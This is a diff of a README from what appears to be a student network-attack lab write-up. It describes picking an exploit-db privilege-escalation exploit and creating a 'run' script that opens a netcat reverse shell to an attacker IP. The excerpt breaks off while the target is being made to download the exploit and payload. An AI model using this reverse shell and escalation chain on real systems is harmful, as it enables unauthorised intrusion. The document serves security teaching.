jjay1288/NetworkAttackProject/README.md

 ![login](https://github.com/jjay1288/netattacksproj/blob/main/target/screens/uname.PNG)

-​	After using searchsploit to research, I decided on a privilege escalation method found [here](https://www.exploit-db.com/exploits/8572).
+​	After a search through exploitdb, we decide on a privilege escalation method found [here](https://www.exploit-db.com/exploits/8572).
 First, we download the exploit source code and save it as "8572.c".
-Then we create a new file, "run
+Then we create a new file named "run
-", and insert and save the following code:
+" and populate the file with the following bash script:

 ```bash
 #!/bin/bash
 nc 192.168.1.210 12345 -e /bin/bash
 ```

-​	We save this, and start up the Python simple.http server with port 8080 on our attack box in the folder.
+​	We save this, and start up the Python simple.http server with port 8080 on our attack box.
 On the target, we execute the following to download our exploit and payload.

 ```bash
 cd /tmp